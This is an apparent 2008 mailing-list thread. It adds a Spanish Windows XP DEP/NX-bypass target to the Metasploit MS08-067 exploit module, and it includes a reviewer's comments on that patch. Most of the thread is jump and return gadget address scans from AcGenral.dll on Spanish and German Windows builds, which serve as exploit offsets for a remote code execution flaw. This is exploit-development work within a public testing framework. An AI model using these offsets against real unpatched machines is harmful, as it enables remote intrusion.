
MS08-067 added to SVN trunk (3.2-testing)


From: ulises2k at gmail.com (Ulises2k)
Date: Wed, 29 Oct 2008 17:23:37 -0200

Patch adding a Windows XP SP2/SP3 Spanish (DEP/NX bypass) target to ms08_067_netapi.rb; the AcGenral.dll gadget scan the addresses were taken from is included below.


--- ms08_067_netapi.rb        2008-10-28 14:58:32.000000000 -0200
+++ ms08_067_netapi.rb     2008-10-28 15:14:28.000000000 -0200
@@ -76,6 +76,14 @@
                                                }
                                        ], # JMP ESI ACGENRAL.DLL, DEP/NX
BYPASS ACGENRAL.DLL

+                                       [ 'Windows XP SP2/SP3 Spanish
(DEP)',
+                                               {
+                                                       'Ret'       =>
0x6fdbf807,
+                                                       'DisableNX' =>
0x6fdc17c2,
+                                                       'Scratch'   =>
0x00020408,
+                                               }
+                                       ], # JMP ESI ACGENRAL.DLL, DEP/NX
BYPASS ACGENRAL.DLL
+
                                        [ 'Windows 2003 SP0 English (NO
DEP)',
                                                {
                                                        'Ret'       =>
0x71bf175f,
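Review bot: The trailing comment on the new entry, `], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL`, was copied from the English entry above it, but the gadget listing posted below this patch shows 0x6fdbf807 as `call esi`, not a jmp; I would write `], # CALL ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL` so the comment matches what the scan actually found. The target name folds SP2 and SP3 into one entry, yet the listing does not say which service pack the addresses came from, and nothing here shows AcGenral.dll loads at the same base with the same code on both; please state that both were tested, or split the entry if only one was. The bytes quoted for 0x6fdc17c2 (`6a048d4508506a226aff`) decode to push 4 / lea eax,[ebp+8] / push eax / push 22h / push -1, which looks consistent with what the DisableNX field is meant to point at, so that address seems plausible. The Scratch value 0x00020408 is not explained anywhere in the post; it would be worth a one-line note on why that address is writable on the Spanish build rather than leaving it as an apparent copy from another target.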



-------------------------------------------------------------------------------------------

[acgenral.dll]
0x6fdbf807 call esi
0x6fdc14f8 call esi
0x6fdc153f call esi
0x6fdc18ab call esi
0x6fdc18b6 call esi
0x6fdc2b32 call esi
0x6fdc2b37 call esi
0x6fdc2b65 call esi
0x6fdc2b70 call esi
0x6fdc2b94 call esi
0x6fdc2b9a call esi
0x6fdc2bea call esi
0x6fdc2bef call esi
0x6fdc349c call esi
0x6fdc350c call esi
0x6fdc5334 call esi
0x6fdc533b call esi
0x6fdc53b4 call esi
0x6fdc53bb call esi
0x6fdc5a60 call esi
0x6fdc5a8e call esi
0x6fdc5add call esi
0x6fdc5ae2 call esi
0x6fdc6961 call esi
0x6fdc6964 call esi
0x6fdc6967 call esi
0x6fdc6a08 call esi
0x6fdc6a44 call esi
0x6fdc6a54 call esi
0x6fdc7fef call esi
0x6fdc7ff9 call esi
0x6fdc856e call esi
0x6fdcb04a call esi
0x6fdcd8c5 call esi
0x6fdcd8cd call esi
0x6fdcdaa8 call esi
0x6fdcdac0 call esi
0x6fdcdad3 call esi
0x6fdcdaeb call esi
0x6fdcdafe call esi
0x6fdcdb16 call esi
0x6fdcdb2d call esi
0x6fdcdb43 call esi
0x6fdcdb6c call esi
0x6fdcdc4c call esi
0x6fdcdc6a call esi
0x6fdcdc7d call esi
0x6fdcdc95 call esi
0x6fdcdcaa call esi
0x6fdcde42 call esi
0x6fdcdeaf call esi
0x6fdce055 call esi
0x6fdce06a call esi
0x6fdce0f5 call esi
0x6fdce105 call esi
0x6fdd092e call esi
0x6fdd093c call esi
0x6fdd1358 call esi
0x6fdd1375 call esi
0x6fdd1403 call esi
0x6fdd1421 call esi
0x6fdd3830 call esi
0x6fdd3843 call esi
0x6fdd387a call esi
0x6fdd388d call esi
0x6fdd38c4 call esi
0x6fdd38d7 call esi
0x6fdd4f80 call esi
0x6fdd4fa9 call esi
0x6fdd4fd2 call esi
0x6fdd4ffb call esi
0x6fdd5024 call esi
0x6fdd504d call esi
0x6fdd5076 call esi
0x6fdd509f call esi
0x6fdd50c8 call esi
0x6fdd8938 call esi
0x6fdd896f call esi
0x6fdd89a2 call esi
0x6fdd89c5 call esi
0x6fddba79 push esi; ret
0x6fddbac2 push esi; ret
0x6fddbafb push esi; ret
0x6fddc9da call esi
0x6fddca35 call esi
0x6fddd082 call esi
0x6fddd093 call esi
0x6fddd0a0 call esi
0x6fddd0b6 call esi
0x6fddd0c7 call esi
0x6fdde111 call esi
0x6fdde124 call esi
0x6fddff23 call esi
0x6fde174b call esi

[acgenral.dll]
0x6fdc17c2 6a048d4508506a226aff

--
Ulises U. Cu??
Web: http://www.ulises2k.com.ar


On Tue, Oct 28, 2008 at 12:41, Thierry Zoller <Thierry at zoller.lu> wrote:

Salut,

Windows SP3 GERMAN

Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with the EAX
register
0x6FD9C45C      call EAX
0x6FD9C4A3      call EAX
0x6FD9C4EA      call EAX
0x6FD9C531      call EAX
0x6FD9C574      call EAX
0x6FD9C5B0      call EAX
0x6FD9C5EC      call EAX
0x6FD9C628      call EAX
0x6FD9C66B      call EAX
0x6FD9C67E      call EAX
0x6FD9C6AE      call EAX
0x6FD9C6C1      call EAX
0x6FD9C6F1      call EAX
0x6FD9C704      call EAX
0x6FD9C734      call EAX
0x6FD9C747      call EAX
0x6FD9F8C3      call EAX
0x6FDA49F9      call EAX
0x6FDA4A40      call EAX
0x6FDA4A87      call EAX
0x6FDA4AE1      call EAX
0x6FDA4B21      call EAX
0x6FDA4B61      call EAX
0x6FDA4B9B      call EAX
0x6FDA4BD5      call EAX
0x6FDA4C0F      call EAX
0x6FDA5F6A      call EAX
0x6FDA617B      call EAX
0x6FDA6448      call EAX
0x6FDA6517      call EAX
0x6FDA9C6F      jmp EAX
0x6FDAACD1      call EAX
0x6FDAFB6F      call EAX
0x6FDB1DA5      call EAX
0x6FDB1DE7      call EAX
0x6FDB1E65      call EAX
0x6FDB1EDB      call EAX
0x6FDB60A2      call EAX
0x6FDB60FE      call EAX
0x6FDB62C0      jmp EAX
0x6FDB62D3      jmp EAX
0x6FDB652D      jmp EAX
0x6FDB6809      push EAX - ret
0x6FDB703F      call EAX
0x6FDB7087      call EAX
0x6FDB7E76      call EAX
0x6FDB7E97      call EAX
0x6FDB7EB2      call EAX
0x6FDB7F40      call EAX
0x6FDB8B73      push EAX - ret
0x6FDB8B9B      push EAX - ret
0x6FDB8DBA      call EAX
0x6FDB9A53      call EAX
0x6FDB9A95      call EAX
0x6FDBCF8D      call EAX
0x6FDBD012      call EAX
0x6FDBD0D7      call EAX
0x6FDBD11C      call EAX
0x6FDBD12E      call EAX
0x6FDBDCBE      pop EAX - pop - ret
0x6FDC115B      call EAX
0x6FDC175F      jmp EAX
Finished Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with
the EAX register
Found 62 usable addresses

Findjmp, Eeye, I2S-LaB
Findjmp2, Hat-Squad
Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with the EBX
register
0x6FD9C065      pop EBX - pop - retbis
0x6FD9D965      call EBX
0x6FD9D97F      pop EBX - pop - retbis
0x6FD9E085      call EBX
0x6FD9E0B8      call EBX
0x6FD9E0BC      pop EBX - pop - retbis
0x6FD9E0FB      call EBX
0x6FD9E12E      call EBX
0x6FD9E132      pop EBX - pop - retbis
0x6FD9E171      call EBX
0x6FD9E1A4      call EBX
0x6FD9E1A8      pop EBX - pop - retbis
0x6FD9E1E7      call EBX
0x6FD9E21A      call EBX
0x6FD9E21E      pop EBX - pop - retbis
0x6FD9EE35      pop EBX - pop - retbis
0x6FD9FCD8      pop EBX - pop - retbis
0x6FDA048B      pop EBX - pop - retbis
0x6FDA0A37      pop EBX - pop - retbis
0x6FDA1420      pop EBX - pop - retbis
0x6FDA14FB      call EBX
0x6FDA1608      pop EBX - pop - retbis
0x6FDA2524      pop EBX - pop - retbis
0x6FDA3229      pop EBX - pop - retbis
0x6FDA5A6C      call EBX
0x6FDA5A94      call EBX
0x6FDA6298      call EBX
0x6FDA641A      call EBX
0x6FDA7178      pop EBX - pop - retbis
0x6FDA76FB      pop EBX - pop - retbis
0x6FDA827E      pop EBX - pop - retbis
0x6FDA8341      call EBX
0x6FDA875E      pop EBX - pop - retbis
0x6FDA89A2      pop EBX - pop - retbis
0x6FDA8D01      pop EBX - pop - retbis
0x6FDAA603      pop EBX - pop - retbis
0x6FDAA6D1      pop EBX - pop - retbis
0x6FDAAB5E      pop EBX - pop - retbis
0x6FDAB5AD      pop EBX - pop - retbis
0x6FDAB619      pop EBX - pop - retbis
0x6FDAC943      pop EBX - pop - retbis
0x6FDACA21      pop EBX - pop - retbis
0x6FDACED4      pop EBX - pop - retbis
0x6FDAE0F8      call EBX
0x6FDAE108      call EBX
0x6FDAF1A8      pop EBX - pop - retbis
0x6FDAF1E7      pop EBX - pop - retbis
0x6FDB0713      pop EBX - pop - retbis
0x6FDB126D      pop EBX - pop - retbis
0x6FDB14E1      pop EBX - pop - retbis
0x6FDB155C      pop EBX - pop - retbis
0x6FDB1852      pop EBX - pop - retbis
0x6FDB1E20      pop EBX - pop - retbis
0x6FDB1E9E      pop EBX - pop - retbis
0x6FDB2032      pop EBX - pop - retbis
0x6FDB28A1      call EBX
0x6FDB28C0      call EBX
0x6FDB2939      pop EBX - pop - retbis
0x6FDB2A9B      pop EBX - pop - retbis
0x6FDB2B6C      pop EBX - pop - retbis
0x6FDB2C98      pop EBX - pop - retbis
0x6FDB2E05      pop EBX - pop - retbis
0x6FDB380F      pop EBX - pop - retbis
0x6FDB3D0F      pop EBX - pop - retbis
0x6FDB4120      pop EBX - pop - retbis
0x6FDB42C2      pop EBX - pop - retbis
0x6FDB4978      call EBX
0x6FDB49AF      call EBX
0x6FDB54BA      pop EBX - pop - retbis
0x6FDB5BA9      pop EBX - pop - retbis
0x6FDB5E74      pop EBX - pop - retbis
0x6FDB6108      pop EBX - pop - retbis
0x6FDB6BB7      pop EBX - pop - ret
0x6FDB6BBD      pop EBX - pop - ret
0x6FDB7861      pop EBX - pop - ret
0x6FDB7B48      pop EBX - pop - ret
0x6FDB7FAE      pop EBX - pop - ret
0x6FDB8B1A      call EBX
0x6FDB8B3D      call EBX
0x6FDB9016      call EBX
0x6FDB9040      call EBX
0x6FDB9F92      pop EBX - pop - ret
0x6FDBA033      pop EBX - pop - ret
0x6FDBAC9D      call EBX
0x6FDBACFD      call EBX
0x6FDBB234      pop EBX - pop - ret
0x6FDBCCAF      call EBX
0x6FDBDF0D      pop EBX - pop - ret
0x6FDBE645      pop EBX - pop - ret
0x6FDBE802      pop EBX - pop - ret
0x6FDC132F      jmp EBX
Finished Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with
the EBX register
Found 91 usable addresses

Findjmp, Eeye, I2S-LaB
Findjmp2, Hat-Squad
Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with the ECX
register
0x6FD9D2AE      pop ECX - pop - retbis
0x6FD9E273      pop ECX - pop - retbis
0x6FDA0353      call ECX
0x6FDA16FF      pop ECX - pop - ret
0x6FDA1B6D      pop ECX - pop - ret
0x6FDA25BA      pop ECX - pop - retbis
0x6FDA8445      pop ECX - pop - ret
0x6FDA84FF      pop ECX - pop - ret
0x6FDB12E4      pop ECX - pop - ret
0x6FDB26FB      pop ECX - pop - ret
0x6FDB2CFE      pop ECX - pop - ret
0x6FDB6147      pop ECX - pop - ret
0x6FDB6267      pop ECX - pop - ret
0x6FDB67E0      pop ECX - pop - retbis
0x6FDB6FD6      push ECX - ret
0x6FDB762E      pop ECX - pop - ret
0x6FDB7921      pop ECX - pop - ret
0x6FDB7A8F      pop ECX - pop - ret
0x6FDB7CF4      pop ECX - pop - ret
0x6FDB7ED2      call ECX
0x6FDB7FC6      pop ECX - pop - ret
0x6FDB94B5      pop ECX - pop - ret
0x6FDB99D1      call ECX
0x6FDBA6E1      call ECX
0x6FDBB871      call ECX
0x6FDBC16E      pop ECX - pop - ret
0x6FDBDD5E      pop ECX - pop - ret
0x6FDBDD88      pop ECX - pop - ret
0x6FDBDDC5      pop ECX - pop - ret
0x6FDBDDEF      pop ECX - pop - ret
0x6FDBE8F0      pop ECX - pop - ret
Finished Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with
the ECX register
Found 31 usable addresses

Findjmp, Eeye, I2S-LaB
Findjmp2, Hat-Squad
Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with the EDX
register
0x6FDC17AF      call EDX
Finished Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with
the EDX register
Found 1 usable addresses

Findjmp, Eeye, I2S-LaB
Findjmp2, Hat-Squad
Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with the ESI
register
0x6FD9C1AA      pop ESI - pop - retbis
0x6FD9C1E3      pop ESI - pop - retbis
0x6FD9C21C      pop ESI - pop - retbis
0x6FD9C255      pop ESI - pop - retbis
0x6FD9C291      pop ESI - pop - retbis
0x6FD9C2D1      pop ESI - pop - retbis
0x6FD9C310      pop ESI - pop - retbis
0x6FD9C34F      pop ESI - pop - retbis
0x6FD9C391      pop ESI - pop - retbis
0x6FD9C3D3      pop ESI - pop - retbis
0x6FD9C416      pop ESI - pop - retbis
0x6FD9C478      pop ESI - pop - retbis
0x6FD9C4BF      pop ESI - pop - retbis
0x6FD9C506      pop ESI - pop - retbis
0x6FD9C54D      pop ESI - pop - retbis
0x6FD9C589      pop ESI - pop - retbis
0x6FD9C5C5      pop ESI - pop - retbis
0x6FD9C601      pop ESI - pop - retbis
0x6FD9C63D      pop ESI - pop - retbis
0x6FD9C680      pop ESI - pop - retbis
0x6FD9C6C3      pop ESI - pop - retbis
0x6FD9C706      pop ESI - pop - retbis
0x6FD9C749      pop ESI - pop - retbis
0x6FD9D3AA      pop ESI - pop - retbis
0x6FD9D3FA      pop ESI - pop - retbis
0x6FD9D432      pop ESI - pop - retbis
0x6FD9D4F5      pop ESI - pop - retbis
0x6FD9D8EB      pop ESI - pop - retbis
0x6FD9DD9F      pop ESI - pop - retbis
0x6FD9DDD8      pop ESI - pop - retbis
0x6FD9DE11      pop ESI - pop - retbis
0x6FD9DE4A      pop ESI - pop - retbis
0x6FD9DE86      pop ESI - pop - retbis
0x6FD9DEC6      pop ESI - pop - retbis
0x6FD9DF05      pop ESI - pop - retbis
0x6FD9DF44      pop ESI - pop - retbis
0x6FD9DF86      pop ESI - pop - retbis
0x6FD9DFC8      pop ESI - pop - retbis
0x6FD9E00B      pop ESI - pop - retbis
0x6FD9E2A0      pop ESI - pop - retbis
0x6FD9E6AC      pop ESI - pop - retbis
0x6FD9E82F      pop ESI - pop - ret
0x6FD9EC11      pop ESI - pop - retbis
0x6FD9EDB3      pop ESI - pop - retbis
0x6FD9F172      pop ESI - pop - retbis
0x6FD9F1AF      pop ESI - pop - ret
0x6FD9F2D8      pop ESI - pop - retbis
0x6FD9F7AD      pop ESI - pop - ret
0x6FD9F807      call ESI
0x6FD9F809      pop ESI - pop - retbis
0x6FD9F987      pop ESI - pop - ret
0x6FD9FC79      pop ESI - pop - ret
0x6FD9FE9C      pop ESI - pop - retbis
0x6FD9FF56      pop ESI - pop - ret
0x6FD9FFD7      pop ESI - pop - retbis
0x6FDA005A      pop ESI - pop - retbis
0x6FDA01E2      pop ESI - pop - retbis
0x6FDA021F      pop ESI - pop - ret
0x6FDA038D      pop ESI - pop - retbis
0x6FDA03FD      pop ESI - pop - retbis
0x6FDA0443      pop ESI - pop - retbis
0x6FDA04E2      pop ESI - pop - retbis
0x6FDA055E      pop ESI - pop - retbis
0x6FDA0599      pop ESI - pop - retbis
0x6FDA05DC      pop ESI - pop - retbis
0x6FDA0715      pop ESI - pop - retbis
0x6FDA08D4      pop ESI - pop - retbis
0x6FDA0911      pop ESI - pop - ret
0x6FDA097A      pop ESI - pop - retbis
0x6FDA0AAC      pop ESI - pop - retbis
0x6FDA1098      pop ESI - pop - ret
0x6FDA145B      pop ESI - pop - retbis
0x6FDA14F8      call ESI
0x6FDA153F      call ESI
0x6FDA1645      pop ESI - pop - ret
0x6FDA1885      pop ESI - pop - ret
0x6FDA18AB      call ESI
0x6FDA18B6      call ESI
0x6FDA18FF      pop ESI - pop - retbis
0x6FDA1AB4      pop ESI - pop - ret
0x6FDA1C3E      pop ESI - pop - ret
0x6FDA1C88      pop ESI - pop - retbis
0x6FDA229F      pop ESI - pop - ret
0x6FDA2302      pop ESI - pop - retbis
0x6FDA2459      pop ESI - pop - retbis
0x6FDA2B32      call ESI
0x6FDA2B37      call ESI
0x6FDA2B65      call ESI
0x6FDA2B70      call ESI
0x6FDA2B94      call ESI
0x6FDA2B9A      call ESI
0x6FDA2BEA      call ESI
0x6FDA2BEF      call ESI
0x6FDA2C7F      pop ESI - pop - retbis
0x6FDA2CC9      pop ESI - pop - retbis
0x6FDA2F8E      pop ESI - pop - retbis
0x6FDA30C4      pop ESI - pop - retbis
0x6FDA3475      pop ESI - pop - ret
0x6FDA349C      call ESI
0x6FDA350C      call ESI
0x6FDA38A4      pop ESI - pop - retbis
0x6FDA3AC8      pop ESI - pop - retbis
0x6FDA3B3F      pop ESI - pop - retbis
0x6FDA3BE9      pop ESI - pop - ret
0x6FDA3EF6      pop ESI - pop - retbis
0x6FDA40F2      pop ESI - pop - ret
0x6FDA41E1      pop ESI - pop - ret
0x6FDA423A      pop ESI - pop - retbis
0x6FDA42B6      pop ESI - pop - retbis
0x6FDA4332      pop ESI - pop - retbis
0x6FDA4438      pop ESI - pop - ret
0x6FDA4689      pop ESI - pop - retbis
0x6FDA4762      pop ESI - pop - retbis
0x6FDA479B      pop ESI - pop - retbis
0x6FDA47D4      pop ESI - pop - retbis
0x6FDA480D      pop ESI - pop - retbis
0x6FDA4849      pop ESI - pop - retbis
0x6FDA4889      pop ESI - pop - retbis
0x6FDA48C8      pop ESI - pop - retbis
0x6FDA4907      pop ESI - pop - retbis
0x6FDA4949      pop ESI - pop - retbis
0x6FDA498B      pop ESI - pop - retbis
0x6FDA49CE      pop ESI - pop - retbis
0x6FDA4A15      pop ESI - pop - retbis
0x6FDA4A5C      pop ESI - pop - retbis
0x6FDA4AA3      pop ESI - pop - retbis
0x6FDA4AE3      pop ESI - pop - retbis
0x6FDA4B23      pop ESI - pop - retbis
0x6FDA4B63      pop ESI - pop - retbis
0x6FDA4B9D      pop ESI - pop - retbis
0x6FDA4BD7      pop ESI - pop - retbis
0x6FDA4C11      pop ESI - pop - retbis
0x6FDA4FFE      pop ESI - pop - retbis
0x6FDA51AA      pop ESI - pop - ret
0x6FDA51FA      pop ESI - pop - retbis
0x6FDA524C      pop ESI - pop - retbis
0x6FDA5334      call ESI
0x6FDA533B      call ESI
0x6FDA53B4      call ESI
0x6FDA53BB      call ESI
0x6FDA560D      pop ESI - pop - retbis
0x6FDA564A      pop ESI - pop - ret
0x6FDA5A60      call ESI
0x6FDA5A8E      call ESI
0x6FDA5ADD      call ESI
0x6FDA5AE2      call ESI
0x6FDA5B90      pop ESI - pop - retbis
0x6FDA5BEB      pop ESI - pop - retbis
0x6FDA607A      pop ESI - pop - retbis
0x6FDA665C      pop ESI - pop - retbis
0x6FDA6961      call ESI
0x6FDA6964      call ESI
0x6FDA6967      call ESI
0x6FDA6A08      call ESI
0x6FDA6A44      call ESI
0x6FDA6A54      call ESI
0x6FDA6DE6      pop ESI - pop - retbis
0x6FDA6E2A      pop ESI - pop - retbis
0x6FDA6EF3      pop ESI - pop - retbis
0x6FDA7310      pop ESI - pop - retbis
0x6FDA74F8      pop ESI - pop - retbis
0x6FDA752F      pop ESI - pop - retbis
0x6FDA75D0      pop ESI - pop - retbis
0x6FDA7738      pop ESI - pop - ret
0x6FDA7810      pop ESI - pop - retbis
0x6FDA7AA0      pop ESI - pop - retbis
0x6FDA7C98      pop ESI - pop - retbis
0x6FDA7E18      pop ESI - pop - ret
0x6FDA7E66      pop ESI - pop - retbis
0x6FDA7EB8      pop ESI - pop - retbis
0x6FDA7F09      pop ESI - pop - retbis
0x6FDA7FEF      call ESI
0x6FDA7FF9      call ESI
0x6FDA8000      pop ESI - pop - retbis
0x6FDA81E0      pop ESI - pop - ret
0x6FDA856E      call ESI
0x6FDA879B      pop ESI - pop - ret
0x6FDA8D3E      pop ESI - pop - ret
0x6FDA8E25      pop ESI - pop - retbis
0x6FDA8E5C      pop ESI - pop - retbis
0x6FDA8E93      pop ESI - pop - retbis
0x6FDA8ECA      pop ESI - pop - retbis
0x6FDA90F1      pop ESI - pop - retbis
0x6FDA91E5      pop ESI - pop - ret
0x6FDA9248      pop ESI - pop - retbis
0x6FDA9792      pop ESI - pop - retbis
0x6FDA97CF      pop ESI - pop - ret
0x6FDA988B      pop ESI - pop - retbis
0x6FDA98D2      pop ESI - pop - retbis
0x6FDA9916      pop ESI - pop - retbis
0x6FDA9966      pop ESI - pop - retbis
0x6FDA9BBA      pop ESI - pop - ret
0x6FDA9CA5      pop ESI - pop - retbis
0x6FDA9F71      pop ESI - pop - ret
0x6FDAA309      pop ESI - pop - retbis
0x6FDAA350      pop ESI - pop - retbis
0x6FDAA3A1      pop ESI - pop - retbis
0x6FDAA3F5      pop ESI - pop - retbis
0x6FDAA538      pop ESI - pop - retbis
0x6FDAA959      pop ESI - pop - retbis
0x6FDAAB92      pop ESI - pop - retbis
0x6FDAAC79      pop ESI - pop - retbis
0x6FDAB002      pop ESI - pop - ret
0x6FDAB04A      call ESI
0x6FDAB05F      pop ESI - pop - retbis
0x6FDAB109      pop ESI - pop - ret
0x6FDAB14E      pop ESI - pop - retbis
0x6FDAB54E      pop ESI - pop - ret
0x6FDAB6FC      pop ESI - pop - ret
0x6FDAB8A2      pop ESI - pop - retbis
0x6FDAB90F      pop ESI - pop - retbis
0x6FDABE91      pop ESI - pop - retbis
0x6FDABEE6      pop ESI - pop - retbis
0x6FDABF31      pop ESI - pop - retbis
0x6FDABF74      pop ESI - pop - retbis
0x6FDABFA7      pop ESI - pop - retbis
0x6FDABFE0      pop ESI - pop - retbis
0x6FDAC197      pop ESI - pop - retbis
0x6FDAC5D8      pop ESI - pop - retbis
0x6FDAC605      pop ESI - pop - retbis
0x6FDAC63B      pop ESI - pop - retbis
0x6FDAC671      pop ESI - pop - retbis
0x6FDAC7A8      pop ESI - pop - retbis
0x6FDAC7D6      pop ESI - pop - retbis
0x6FDACA57      pop ESI - pop - retbis
0x6FDACA91      pop ESI - pop - retbis
0x6FDACAFD      pop ESI - pop - retbis
0x6FDACBCC      pop ESI - pop - retbis
0x6FDACC0B      pop ESI - pop - retbis
0x6FDACC4F      pop ESI - pop - retbis
0x6FDACD3D      pop ESI - pop - retbis
0x6FDACD93      pop ESI - pop - retbis
0x6FDACDE9      pop ESI - pop - retbis
0x6FDACE1E      pop ESI - pop - retbis
0x6FDACE53      pop ESI - pop - retbis
0x6FDAD26E      pop ESI - pop - retbis
0x6FDAD308      pop ESI - pop - retbis
0x6FDAD36E      pop ESI - pop - retbis
0x6FDAD8C5      call ESI
0x6FDAD8CD      call ESI
0x6FDADAA8      call ESI
0x6FDADAC0      call ESI
0x6FDADAD3      call ESI
0x6FDADAEB      call ESI
0x6FDADAFE      call ESI
0x6FDADB16      call ESI
0x6FDADB2D      call ESI
0x6FDADB43      call ESI
0x6FDADB6C      call ESI
0x6FDADC4C      call ESI
0x6FDADC6A      call ESI
0x6FDADC7D      call ESI
0x6FDADC95      call ESI
0x6FDADCAA      call ESI
0x6FDADE42      call ESI
0x6FDADEAF      call ESI
0x6FDAE055      call ESI
0x6FDAE06A      call ESI
0x6FDAE0F5      call ESI
0x6FDAE105      call ESI
0x6FDAE1B9      pop ESI - pop - ret
0x6FDAE39A      pop ESI - pop - retbis
0x6FDAE473      pop ESI - pop - retbis
0x6FDAE4B2      pop ESI - pop - ret
0x6FDAE749      pop ESI - pop - ret
0x6FDAEC13      pop ESI - pop - ret
0x6FDAEC43      pop ESI - pop - retbis
0x6FDAEE4E      pop ESI - pop - retbis
0x6FDAF010      pop ESI - pop - ret
0x6FDAF16B      pop ESI - pop - ret
0x6FDAF22C      pop ESI - pop - retbis
0x6FDAF271      pop ESI - pop - retbis
0x6FDAF2B8      pop ESI - pop - retbis
0x6FDAF2FC      pop ESI - pop - retbis
0x6FDAF343      pop ESI - pop - retbis
0x6FDAF646      pop ESI - pop - retbis
0x6FDB02B9      pop ESI - pop - retbis
0x6FDB03E7      pop ESI - pop - retbis
0x6FDB042A      pop ESI - pop - retbis
0x6FDB0483      pop ESI - pop - retbis
0x6FDB0589      pop ESI - pop - retbis
0x6FDB078D      pop ESI - pop - retbis
0x6FDB092E      call ESI
0x6FDB093C      call ESI
0x6FDB0942      pop ESI - pop - retbis
0x6FDB0FBE      pop ESI - pop - ret
0x6FDB1358      call ESI
0x6FDB1375      call ESI
0x6FDB1403      call ESI
0x6FDB1421      call ESI
0x6FDB15B1      pop ESI - pop - retbis
0x6FDB1AB9      pop ESI - pop - retbis
0x6FDB1D1A      pop ESI - pop - retbis
0x6FDB1DBE      pop ESI - pop - retbis
0x6FDB1F09      pop ESI - pop - retbis
0x6FDB21A4      pop ESI - pop - retbis
0x6FDB2475      pop ESI - pop - retbis
0x6FDB24AB      pop ESI - pop - retbis
0x6FDB26B8      pop ESI - pop - retbis
0x6FDB2737      pop ESI - pop - ret
0x6FDB276C      pop ESI - pop - retbis
0x6FDB279E      pop ESI - pop - retbis
0x6FDB27DB      pop ESI - pop - retbis
0x6FDB2806      pop ESI - pop - retbis
0x6FDB283D      pop ESI - pop - retbis
0x6FDB2A17      pop ESI - pop - retbis
0x6FDB2A5F      pop ESI - pop - retbis
0x6FDB2AFB      pop ESI - pop - retbis
0x6FDB2B22      pop ESI - pop - retbis
0x6FDB2BD7      pop ESI - pop - retbis
0x6FDB2BFE      pop ESI - pop - retbis
0x6FDB2C1D      pop ESI - pop - retbis
0x6FDB2C3F      pop ESI - pop - retbis
0x6FDB2CCB      pop ESI - pop - retbis
0x6FDB2D20      pop ESI - pop - retbis
0x6FDB2D64      pop ESI - pop - retbis
0x6FDB2D97      pop ESI - pop - retbis
0x6FDB308D      pop ESI - pop - retbis
0x6FDB30F5      pop ESI - pop - retbis
0x6FDB3429      pop ESI - pop - retbis
0x6FDB34FF      pop ESI - pop - retbis
0x6FDB3547      pop ESI - pop - retbis
0x6FDB35C1      pop ESI - pop - retbis
0x6FDB361A      pop ESI - pop - retbis
0x6FDB3661      pop ESI - pop - retbis
0x6FDB36F6      pop ESI - pop - retbis
0x6FDB3782      pop ESI - pop - retbis
0x6FDB37BD      pop ESI - pop - retbis
0x6FDB3830      call ESI
0x6FDB3843      call ESI
0x6FDB385B      pop ESI - pop - ret
0x6FDB387A      call ESI
0x6FDB388D      call ESI
0x6FDB38A5      pop ESI - pop - ret
0x6FDB38C4      call ESI
0x6FDB38D7      call ESI
0x6FDB38EF      pop ESI - pop - ret
0x6FDB3A6A      pop ESI - pop - retbis
0x6FDB3C1C      pop ESI - pop - retbis
0x6FDB40DE      pop ESI - pop - retbis
0x6FDB419C      pop ESI - pop - retbis
0x6FDB42F9      pop ESI - pop - retbis
0x6FDB47AA      pop ESI - pop - retbis
0x6FDB4A21      pop ESI - pop - retbis
0x6FDB4F80      call ESI
0x6FDB4FA9      call ESI
0x6FDB4FD2      call ESI
0x6FDB4FFB      call ESI
0x6FDB5024      call ESI
0x6FDB504D      call ESI
0x6FDB5076      call ESI
0x6FDB509F      call ESI
0x6FDB50C8      call ESI
0x6FDB51AB      pop ESI - pop - retbis
0x6FDB51FA      pop ESI - pop - retbis
0x6FDB5260      pop ESI - pop - retbis
0x6FDB5300      pop ESI - pop - retbis
0x6FDB5C19      pop ESI - pop - retbis
0x6FDB5CE0      pop ESI - pop - retbis
0x6FDB5EE4      pop ESI - pop - retbis
0x6FDB6064      pop ESI - pop - retbis
0x6FDB628B      pop ESI - pop - retbis
0x6FDB65E4      pop ESI - pop - ret
0x6FDB663C      pop ESI - pop - ret
0x6FDB6798      pop ESI - pop - ret
0x6FDB7486      pop ESI - pop - ret
0x6FDB79D9      pop ESI - pop - ret
0x6FDB7AD4      pop ESI - pop - ret
0x6FDB7EA1      pop ESI - pop - ret
0x6FDB7F83      pop ESI - pop - ret
0x6FDB86DF      pop ESI - pop - ret
0x6FDB8938      call ESI
0x6FDB896F      call ESI
0x6FDB89A2      call ESI
0x6FDB89C5      call ESI
0x6FDB8E99      pop ESI - pop - ret
0x6FDB904D      pop ESI - pop - ret
0x6FDB90EF      pop ESI - pop - ret
0x6FDB9127      pop ESI - pop - ret
0x6FDB91A3      pop ESI - pop - ret
0x6FDB99F8      pop ESI - pop - ret
0x6FDB9B07      pop ESI - pop - retbis
0x6FDB9CF0      pop ESI - pop - ret
0x6FDB9FEE      pop ESI - pop - ret
0x6FDBB1F5      pop ESI - pop - ret
0x6FDBC9DA      call ESI
0x6FDBCA35      call ESI
0x6FDBCB64      pop ESI - pop - ret
0x6FDBD082      call ESI
0x6FDBD093      call ESI
0x6FDBD0A0      call ESI
0x6FDBD0B6      call ESI
0x6FDBD0C7      call ESI
0x6FDBD1A7      pop ESI - pop - ret
0x6FDBD24B      pop ESI - pop - ret
0x6FDBD3E5      pop ESI - pop - ret
0x6FDBD44F      pop ESI - pop - ret
0x6FDBD532      pop ESI - pop - ret
0x6FDBD7AC      pop ESI - pop - ret
0x6FDBD7D1      pop ESI - pop - ret
0x6FDBD7F3      pop ESI - pop - ret
0x6FDBD88C      pop ESI - pop - ret
0x6FDBE111      call ESI
0x6FDBE124      call ESI
0x6FDBE312      pop ESI - pop - ret
0x6FDBE57C      pop ESI - pop - ret
0x6FDBE83A      pop ESI - pop - ret
0x6FDBEAB5      pop ESI - pop - ret
0x6FDBEC59      pop ESI - pop - ret
0x6FDBED2E      pop ESI - pop - ret
0x6FDBFF23      call ESI
0x6FDC174B      call ESI
